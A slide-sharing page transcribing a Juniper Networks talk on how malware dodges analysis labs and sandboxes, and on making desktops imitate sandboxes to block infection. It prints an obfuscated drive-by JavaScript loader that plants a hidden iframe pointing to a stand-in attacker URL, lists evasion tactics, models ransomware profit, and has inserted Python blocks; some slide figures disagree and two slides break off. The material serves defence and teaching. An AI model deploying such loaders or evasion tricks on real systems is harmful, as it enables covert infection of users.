Unraveling Multimodality with Large Language Models.pdfAlex Barbosa Coqueiro
 

Recently uploaded (20)

SAP Build Work Zone - Overview L2-L3.pptx
SAP Build Work Zone - Overview L2-L3.pptxSAP Build Work Zone - Overview L2-L3.pptx
SAP Build Work Zone - Overview L2-L3.pptx
 
Advanced Computer Architecture – An Introduction
Advanced Computer Architecture – An IntroductionAdvanced Computer Architecture – An Introduction
Advanced Computer Architecture – An Introduction
 
A Deep Dive on Passkeys: FIDO Paris Seminar.pptx
A Deep Dive on Passkeys: FIDO Paris Seminar.pptxA Deep Dive on Passkeys: FIDO Paris Seminar.pptx
A Deep Dive on Passkeys: FIDO Paris Seminar.pptx
 
Dev Dives: Streamline document processing with UiPath Studio Web
Dev Dives: Streamline document processing with UiPath Studio WebDev Dives: Streamline document processing with UiPath Studio Web
Dev Dives: Streamline document processing with UiPath Studio Web
 
Developer Data Modeling Mistakes: From Postgres to NoSQL
Developer Data Modeling Mistakes: From Postgres to NoSQLDeveloper Data Modeling Mistakes: From Postgres to NoSQL
Developer Data Modeling Mistakes: From Postgres to NoSQL
 
New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
 
Gen AI in Business - Global Trends Report 2024.pdf
Gen AI in Business - Global Trends Report 2024.pdfGen AI in Business - Global Trends Report 2024.pdf
Gen AI in Business - Global Trends Report 2024.pdf
 
TeamStation AI System Report LATAM IT Salaries 2024
TeamStation AI System Report LATAM IT Salaries 2024TeamStation AI System Report LATAM IT Salaries 2024
TeamStation AI System Report LATAM IT Salaries 2024
 
Take control of your SAP testing with UiPath Test Suite
Take control of your SAP testing with UiPath Test SuiteTake control of your SAP testing with UiPath Test Suite
Take control of your SAP testing with UiPath Test Suite
 
"ML in Production",Oleksandr Bagan
"ML in Production",Oleksandr Bagan"ML in Production",Oleksandr Bagan
"ML in Production",Oleksandr Bagan
 
The Role of FIDO in a Cyber Secure Netherlands: FIDO Paris Seminar.pptx
The Role of FIDO in a Cyber Secure Netherlands: FIDO Paris Seminar.pptxThe Role of FIDO in a Cyber Secure Netherlands: FIDO Paris Seminar.pptx
The Role of FIDO in a Cyber Secure Netherlands: FIDO Paris Seminar.pptx
 
Generative AI for Technical Writer or Information Developers
Generative AI for Technical Writer or Information DevelopersGenerative AI for Technical Writer or Information Developers
Generative AI for Technical Writer or Information Developers
 
Ensuring Technical Readiness For Copilot in Microsoft 365
Ensuring Technical Readiness For Copilot in Microsoft 365Ensuring Technical Readiness For Copilot in Microsoft 365
Ensuring Technical Readiness For Copilot in Microsoft 365
 
How AI, OpenAI, and ChatGPT impact business and software.
How AI, OpenAI, and ChatGPT impact business and software.How AI, OpenAI, and ChatGPT impact business and software.
How AI, OpenAI, and ChatGPT impact business and software.
 
DevoxxFR 2024 Reproducible Builds with Apache Maven
DevoxxFR 2024 Reproducible Builds with Apache MavenDevoxxFR 2024 Reproducible Builds with Apache Maven
DevoxxFR 2024 Reproducible Builds with Apache Maven
 
DSPy a system for AI to Write Prompts and Do Fine Tuning
DSPy a system for AI to Write Prompts and Do Fine TuningDSPy a system for AI to Write Prompts and Do Fine Tuning
DSPy a system for AI to Write Prompts and Do Fine Tuning
 
"Debugging python applications inside k8s environment", Andrii Soldatenko
"Debugging python applications inside k8s environment", Andrii Soldatenko"Debugging python applications inside k8s environment", Andrii Soldatenko
"Debugging python applications inside k8s environment", Andrii Soldatenko
 
Scanning the Internet for External Cloud Exposures via SSL Certs
Scanning the Internet for External Cloud Exposures via SSL CertsScanning the Internet for External Cloud Exposures via SSL Certs
Scanning the Internet for External Cloud Exposures via SSL Certs
 
Unraveling Multimodality with Large Language Models.pdf
Unraveling Multimodality with Large Language Models.pdfUnraveling Multimodality with Large Language Models.pdf
Unraveling Multimodality with Large Language Models.pdf
 
DMCC Future of Trade Web3 - Special Edition
DMCC Future of Trade Web3 - Special EditionDMCC Future of Trade Web3 - Special Edition
DMCC Future of Trade Web3 - Special Edition
 

Thinking Outside the Sand[box]

1. Thinking Outside the[Sand]box
   Kyle Adams - Juniper Networks
   This presentation is for educational purposes only

2. Introduction
   Chief Software Architect for Junos Web App Secure
   “Junos Web App Secure is a security deception technology designed to lace web applications with honeypots on-the-fly”
   More recently, leading efforts in malware research. Can’t share exactly why, but I can share some interesting ideas that have surfaced as a result.

3. Primary Goal
   Inoculate your machine from infection by specific classes of malware

4. Background
   • Malware Analysis Background
     o Malware Collection Techniques
     o Malware Analysis Techniques
     o Signature Development
   • Malware Authoring ROI
     o Malware ROI
     o Optimizing for Success
     o Hypothetical Example
   • Evasion
     o Distribution Evasion
     o Sandbox Evasion

5. Background / Malware Collection
   How do analysts get malware samples?
   • Web Crawlers
   • Torrents
   • Usenet
   • Malware Repositories
   • Email
   • Droppers

6. Background / Malware Analysis
   How do malware analysts inspect malware?
   • Static File Analysis
   • Virtual Machine Sandboxing
   • Code Emulation Sandboxing

7. Background / Signatures
   How do malware signatures get created?
   1. Get a sample
   2. Analyze it for unique behaviors - Generate heuristic behavior signature
   3. Analyze it for unique data patterns - Generate file data signature
   4. Distribute new signatures to customers
   5. Remove old unnecessary signatures

8. Background / Malware ROI
   Uninterrupted Lifecycle: Research → Development → Testing → Distribution → Grow Infection Base
   The infection base grows indefinitely. The more machines infected, the more return the attacker gets for their initial investment.
   In other words… Time = Money

9. Background / Malware ROI
   Interrupted Lifecycle: Research → Development → Testing → Distribution → Grow Infection Base, cut short by Sample Collected → Sample Detected → Signature Published
   The infection base grows until a signature is published. It then rapidly declines in growth rate and eventually becomes negligible. The more machines infected, the more return the attacker gets for their initial investment.
   So… Time to DETECTION = Money

10. Background / Optimizing For Success
   Hypothetical Example:
   Bob spends 20 hours researching his target environment. Another 20 hours writing some ransomware and testing it. Finally, Bob pays someone to distribute his malware for 50 cents per infection, with a distribution rate of 200 clients per hour. Bob’s ransom is $300 and 10% of his victims will choose to pay.
   So for every hour Bob’s malware is undetected, he makes:
   ((200 clients * .1) * $300) - (200 clients * $0.50) = $5,900 per hour
   Assume the infection rate remains constant for 72 hours, and minus Bob’s time at (~$50 an hour), Bob makes a total of $422,800.

11. Background / Optimizing For Success
   Hypothetical Example:
   Now assume his malware is detected and a signature is published, dropping the successful ransom collection rate to 1 client per hour.
   (hours_before_detection * (((200 clients * .1) * $300) - (200 clients * $0.50))) + (hours_after_detection * (((10 clients * .1) * $300) - (10 clients * $0.50)))
   Detection at 6 hours: Bob makes $52,870
   Detection at 12 hours: Bob makes $88,500
   Detection at 18 hours: Bob makes $120,130
   Detection at 24 hours: Bob makes $153,760
   So for each 6 hours Bob can avoid detection, he makes $30,000 vs. $1,770. That’s a lot of motivation!
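The two-rate profit model behind slides 10 and 11, carried through as an added example that is not part of the deck; `CampaignModel`, `detection_sweep` and the field names are my own, while the parameter values are the slide's figures.

```python
"""Worked instance of the malware-ROI model from the "Optimizing For Success" slides.

Added example, not part of Kyle Adams' deck. It reproduces the hourly and total
figures for "Bob" and generalises the before/after-detection split to any
detection time, so the value of each extra hour of evasion can be read off.
"""
from dataclasses import dataclass
from typing import Dict, Optional, Tuple


@dataclass(frozen=True)
class CampaignModel:
    """Parameters of the hypothetical campaign, as stated on the slides."""
    ransom_usd: float = 300.0             # ransom demanded per victim
    pay_rate: float = 0.10                # fraction of victims who choose to pay
    cost_per_infection_usd: float = 0.50  # paid to the distributor per infection
    rate_before_detection: int = 200      # infections per hour with no signature
    rate_after_detection: int = 10        # infections per hour once a signature exists
    dev_hours: int = 40                   # 20 h research + 20 h writing and testing
    hourly_rate_usd: float = 50.0         # value of Bob's own time (~$50 an hour)

    def profit_per_hour(self, infections_per_hour: int) -> float:
        """Net revenue per hour at a given infection rate:
        (infections * pay_rate * ransom) - (infections * distribution cost)."""
        revenue = infections_per_hour * self.pay_rate * self.ransom_usd
        cost = infections_per_hour * self.cost_per_infection_usd
        return revenue - cost

    def campaign_profit(self, campaign_hours: int, detection_hour: Optional[int]) -> float:
        """Total profit over the campaign minus Bob's labour.

        detection_hour=None is the uninterrupted lifecycle (slide 8); otherwise
        the infection rate drops to rate_after_detection from that hour onward
        (slide 9), which is the piecewise sum written out on slide 11.
        """
        if detection_hour is None or detection_hour >= campaign_hours:
            hours_before = campaign_hours
        else:
            hours_before = max(detection_hour, 0)
        hours_after = campaign_hours - hours_before
        gross = (hours_before * self.profit_per_hour(self.rate_before_detection)
                 + hours_after * self.profit_per_hour(self.rate_after_detection))
        return gross - self.dev_hours * self.hourly_rate_usd


def detection_sweep(model: CampaignModel, campaign_hours: int = 72,
                    step: int = 6) -> Dict[int, float]:
    """Profit as a function of time-to-detection, in `step`-hour increments."""
    return {h: model.campaign_profit(campaign_hours, h)
            for h in range(step, campaign_hours + 1, step)}


def marginal_value_of_evasion(model: CampaignModel, hours: int = 6) -> Tuple[float, float]:
    """What `hours` more of evasion is worth: profit over that window at the
    pre-detection rate versus at the post-detection rate."""
    return (hours * model.profit_per_hour(model.rate_before_detection),
            hours * model.profit_per_hour(model.rate_after_detection))


if __name__ == "__main__":
    m = CampaignModel()
    print(f"undetected: ${m.profit_per_hour(m.rate_before_detection):,.0f} per hour")
    print(f"72 h uninterrupted: ${m.campaign_profit(72, None):,.0f}")
    for h, p in detection_sweep(m).items():
        if h <= 24:
            print(f"detection at {h:2d} h: ${p:,.0f}")
    before, after = marginal_value_of_evasion(m)
    print(f"each 6 h of evasion: ${before:,.0f} vs. ${after:,.0f}")
```

Run as written it reproduces the $5,900 per hour, the $422,800 uninterrupted total and the 6-, 18- and 24-hour totals from the slides; for detection at 12 hours the model gives $86,500, the slide's $88,500 being the same sum without the $2,000 of labour subtracted in the other rows.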
12. Background / Distribution Evasion
   • You can’t analyze something you can’t get.
   • You can’t generate signatures if you can’t analyze it.
   So if you can avoid serving malware to analysis labs, you can avoid detection and signature distribution.
   Distribution Evasion: Distribute malware only to a select set of targets, narrow enough to exclude analysis labs.

13. Background / Distribution Evasion
   Distribution Evasion Tactics:
   • Don’t serve to search engines (Google, Yahoo, Bing, etc…)
   • Don’t serve to known security lab IPs (Symantec, McAfee, etc…)
   • Don’t serve to an environment you can’t infect (Missing Plugins, Unsupported OS, etc…)
   • Randomly choose not to serve
   • Serve only to specific countries/IP ranges
   • Serve only to known browsers
   • Serve only if referer is whitelisted
   • Serve only once per IP

14. Background / Distribution Evasion
   Distribution Evasion Implementation:
   1. Inject obfuscated drive-by download hook into compromised sites:
   <script type="text/javascript">eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('<0 8="7/a">6 2="4://5.9.f";b.g("<3 e=\"1\" d=\"1\" c=\""+2+"\"></3>");</0>',17,17,'script||ste|iframe|http|www|var|text|type|google|javascript|document|src|height|width|com|write'.split('|'),0,{}))</script>
   Deobfuscated, it looks like this:
   <script type="text/javascript">
   var ste = "http://exmpl.badness.ru/loader.php?key=Ah7Bvv034";
   document.write("<iframe width=\"1\" height=\"1\" src=\"" + ste + "\"></iframe>");
   </script>
   But this does nothing to stop automated crawlers in a research lab.

15. Background / Distribution Evasion
   Distribution Evasion Implementation:
   2. Add client-side specificity: The malware requires a specific version of flash to exploit a client, so the drive-by code can actually hide itself unless you have that version of flash.
   <script type="text/javascript">
   … encryption/decryption code …
   eval(decrypt("4f534514404652100c1016594d43460b1e1b54415844591750515d585d414a1d4b471 8585c535355431e445949085d54480970510276434f02030d14035656504c5f525a471c404258445119 1b0b5f5743555c5c15435c5d4658046a1a036511195a525d545a430d6d12056d1b17454352096d1b171 41e1941445c1613121b6f1b0c0b1b5a5445515c550a13100c", navigator.plugins['Shockwave Flash'].version));
   </script>
   Now if the lab isn’t using flash version 12.0.0.44, the drive-by iframe will not

16. Background / Distribution Evasion
   Distribution Evasion Implementation:
   3. Add server-side specificity and filtering: The iframe points to a server whose sole purpose is to exploit browsers and serve malware. In addition to picking the right exploit for the target client, it will also not serve malware if specific conditions are not met:
   • You’re not a search engine
   • Your IP is not blacklisted, or is in a whitelist
   • You’re using an exploitable OS and browser
   • This is the first time you have loaded the iframe
   • Drive-by code has been injected into the domain of your referer
   Since the research lab doesn't know what conditions the distribution server requires, it is exceptionally difficult to trick it into serving the malware.

17. Background / Sandbox Evasion
   Sandbox Evasion Tactics:
   If any of the following are true, do not execute the malware payload:
   • Significant Clock Skew
   • Debugger is attached
   • Virtual Machine Detected
   • No Internet Connection
   • Unexploitable environment
   • Sandbox Software Detected
   • Sleep statements abort prematurely
   Sandboxes can only run for a fixed period of time per sample (usually 30-60 seconds), so the malware may try to run longer:
   • Long sleep before payload execution
   • Schedule payload execution for some time in the future

18. Background / Sandbox Evasion
   Sandbox evasion techniques can be grouped into several high level categories:
   • Specificity
   • Triggers
   • Detection
   • Interruption
   • Dialogs
   Any given malware sample may do zero or more of these.

19. Background / Sandbox Evasion
   Specificity:
   • Has internet connection
   • Has correct software versions
   • Has correct OS
   • Has expected security policies
   • Public IP is in correct geographical region
   • Clock skew is minimal
   • Account data is present (Gmail, AIM, Facebook, etc…)

20. Background / Sandbox Evasion
   Specificity (screenshot captions):
   Requires Email Handling app like Outlook or ThunderBird.
   Requires .NET framework
   Requires Internet Connection
   Requires Win 95/98

21. Background / Sandbox Evasion
   Triggers:
   • Sleep for several minutes
   • Require multiple executions
   • Wait for one or more reboots
   • Wait for event
     o User opens .txt file
     o User launches browser
     o User switches to battery power
     o User updates windows
     o User installs software
     o User connects to WiFi
     o HID activity (Mouse, Keyboard, Webcam, Mic)

22. Background / Sandbox Evasion
   Triggers (screenshot captions):
   Requires browser restart to trigger payload.
   Require a second execution.

23. Background / Sandbox Evasion
   Detection:
   • Debugger Hooks
   • Virtual Machines
     o Registry Keys, Serial Numbers, MAC addresses
     o Processes, Services, Drivers, Open Ports
     o VM Specific ASM instructions
   • Sandbox Software
     o Open Ports, Processes, Files

24. Background / Sandbox Evasion
   Detection (screenshot captions):
   Themida: Legitimate Software Piracy Protection wrapper designed to detect VM’s and debuggers. Go figure, malware authors use it too.
   Debugger detection. And hey, they even explained how to turn off SoftIce (just in case you didn’t know how).
   No Printer?

25. Background / Sandbox Evasion
   Interruption:
   • Analysis Framework Interruption:
     o Force Reboot or Logout
     o Enable Firewall / Whitelist C&C servers
   • Screen Capture Interruption:
     o Open dialogs minimized
     o Open other apps Maximized
     o Flashing components / Animation
     o Hidden MouseOver components

26. Background / Sandbox Evasion
   Interruption (screenshot captions):
   Force a reboot.
   Screen Shot Evasion: The “Play” button flashes. We got lucky and took the screenshot at the right time.

27. Background / Sandbox Evasion
   Dialogs:

28. Background / Sandbox Evasion
   Simple Dialogs:
   What are they?
   • Fake Apps
     o Fake Installers
     o Fake Errors
   Why?
     o Prevent sandbox analysis
     o Phish for information
     o Legitimize → it looks real, so it’s probably safe → red flags (UAC, firewall notices, etc…)

29. Background / Sandbox Evasion
   Simple Dialogs (screenshot captions):
   Legitimize UAC dialogs.
   Require basic human input (click a button).

30. Background / Sandbox Evasion
   Advanced Dialogs:
   • Require account details
   • TOS acceptance
   • Combination Lock
   • Graphic based dialogs

31. Background / Sandbox Evasion
   Advanced Dialogs (screenshot captions):
   Requires password. Presumably available with the download link.
   Captcha style dialog.
   Fake dialog. This dialog looks similar to the default theme of XP, but is clearly not.

32. Deceptive Inoculation
   Bottom line, malware takes great care not to run in a sandbox environment.
   Let’s all be sandboxes! (or at least pretend to be)

33. Deceptive Inoculation
   • Distribution Deception
     o Prevent your personal computer from being sent malware in the first place (stop drive-by-downloads).
   • Sandbox Deception
     o Prevent malware from executing a payload when launched on your personal computer.

34. Inoculation / Distribution Evasion
   Pretend you’re google bot:
   1. Firefox: Install User-Agent-Switcher
   2. Set User-Agent to: Googlebot-Image (Googlebot)
   Pretend none of your plugins are enabled:
   1. Firefox: Go to Tools > Add Ons
   2. For everything in the list, select “Ask To Activate” (Java, Adobe Acrobat, Flash, Silverlight, Office, PDF Reader, ...)
   Disable Referers:
   1. Firefox: Go to about:config
   2. Set “network.http.sendRefererHeader” to 0

35. Inoculation / Distribution Evasion
   Request Suspicious Content Twice: This doesn’t exist yet, but what if….
   [Diagram: an IFRAME VALIDATOR sits between the browser and the web. iframe: badsite.com → Bad Server → embedded flash; repeat: badsite.com → Bad Server → no embedded flash. iframe: goodsite.com → Good Server → no embedded flash.]
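One way the validator on slide 35 could be prototyped, as an added example that is not the deck's code: the double-fetch comparison and the hidden-frame check are my assumptions about how it would judge, and the HTML responses and hostnames below are constructed placeholders.

```python
"""Offline sketch of the "request suspicious content twice" validator.

Added example, not part of Kyle Adams' deck (which says the validator does not
exist yet). Two fetches of the same page are compared: a distribution server
that serves once per IP, or only to a specific plugin version, answers the two
requests differently, while a benign embed is stable across fetches. A 1x1
frame (the deobfuscated loader on slide 14) is flagged on its own.
"""
from dataclasses import dataclass
from html.parser import HTMLParser
from typing import List, Optional, Tuple


@dataclass(frozen=True)
class Embed:
    """An iframe/embed/object start tag with the attributes the validator uses."""
    tag: str
    src: str
    width: Optional[str]
    height: Optional[str]

    def is_hidden(self) -> bool:
        """1x1 or smaller frames are invisible to the user."""
        return _tiny(self.width) and _tiny(self.height)


def _tiny(value: Optional[str]) -> bool:
    if value is None:
        return False
    v = value.strip().lower()
    v = v[:-2] if v.endswith("px") else v
    try:
        return int(v) <= 1
    except ValueError:
        return False


class _EmbedCollector(HTMLParser):
    """Collects every embedding element; HTMLParser lower-cases tag names."""
    TAGS = {"iframe", "embed", "object"}

    def __init__(self) -> None:
        super().__init__()
        self.embeds: List[Embed] = []

    def handle_starttag(self, tag: str, attrs: List[Tuple[str, Optional[str]]]) -> None:
        if tag not in self.TAGS:
            return
        a = {k.lower(): (v or "") for k, v in attrs}
        src = a.get("src") or a.get("data") or ""  # <object> carries data= instead of src=
        self.embeds.append(Embed(tag, src, a.get("width"), a.get("height")))


def extract_embeds(html: str) -> List[Embed]:
    collector = _EmbedCollector()
    collector.feed(html)
    collector.close()
    return collector.embeds


@dataclass(frozen=True)
class Verdict:
    suspicious: bool
    inconsistent: Tuple[str, ...]  # sources present in only one of the two fetches
    hidden: Tuple[str, ...]        # sources loaded in an invisible frame


def validate(first_html: str, repeat_html: str) -> Verdict:
    """Flag a page whose embeds change between two fetches, or that loads a
    hidden frame. Both are heuristics: a site that rotates ad iframes also trips
    the consistency check, so treat a hit as block-and-review, not proof."""
    first, repeat = extract_embeds(first_html), extract_embeds(repeat_html)
    first_keys = {(e.tag, e.src) for e in first}
    repeat_keys = {(e.tag, e.src) for e in repeat}
    inconsistent = tuple(sorted(src for _, src in first_keys ^ repeat_keys))
    hidden = tuple(sorted({e.src for e in first + repeat if e.is_hidden()}))
    return Verdict(bool(inconsistent or hidden), inconsistent, hidden)


# Constructed responses. A "serve only once per IP" server answers the first
# fetch with a 1x1 loader frame and the repeat fetch with the clean page.
LOADER_URL = "http://loader.example.invalid/loader.php?key=PLACEHOLDER"
BAD_FIRST = ('<html><body><p>Welcome</p>'
             f'<iframe width="1" height="1" src="{LOADER_URL}"></iframe></body></html>')
BAD_REPEAT = '<html><body><p>Welcome</p></body></html>'
# A benign embed is visibly sized and identical on every fetch.
GOOD_PAGE = ('<html><body><p>Video</p><iframe width="640" height="360" '
             'src="https://player.example.invalid/embed/1234"></iframe></body></html>')

if __name__ == "__main__":
    print("bad server :", validate(BAD_FIRST, BAD_REPEAT))
    print("good server:", validate(GOOD_PAGE, GOOD_PAGE))
```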
36. Inoculation / Sandbox Evasion
   Permanent Debugger:
   1. Install a debugger
   2. Hook every process automatically
   Spoof VMWare Artifacts:
   1. Create stub exe called “VBoxService.exe” and leave it running on boot.
   Skew your clock:
   1. Change system time to be 1 year behind
   2. Disable clock syncing

37. Inoculation / Sandbox Evasion
   Sandbox Emulation:
   1. Open ports (cuckoo: 2042, mongodb: 27017)
   2. Configure as Cuckoo Guest: http://docs.cuckoosandbox.org/en/latest/installation/guest/ But make sure to cripple the agent!
   These changes may result in instability to the system, and would require some additional testing in a well used desktop environment.
   1. Add a dll named “dbghelp.dll” to registry so it loads into every process
   2. Temporarily Assign windows product ID of “76487-337-8429955-22614” (Assign on boot, revert on shutdown)
   Look into Anubis, JoeBox, CWSandBox, ThreatExpert, and Cuckoo. The

38. Conclusion
   Practicality: As it stands, these techniques require some complex administrative/programming tasks, and would need to be updated regularly. Ideally these types of techniques could be packaged into software that automatically updates and manages settings for you.

39. Conclusion
   Perceived Efficacy: With just these 5 strategies, we were able to prevent 20% of malware activity in the samples we analyzed.
   True Efficacy: Hard to say how effective it really is, because the samples this works on are less likely to be identified as known malware. Fortunately, this means it will reduce malware infection for samples your AV is unlikely to detect with signatures.

40. More Information
   Contact Info:
   Email: kadams@juniper.net
   Twitter: kadams_sec
   LinkedIn: https://www.linkedin.com/in/adamsk
   Presentation Material: http://forums.juniper.net/t5/Security-Mobility-Now/bg-p/networkingnow
   References: http://www.fireeye.com/blog/technical/malware-research/2011/01/the-dead-giveaways-of-vm-awaremalware.html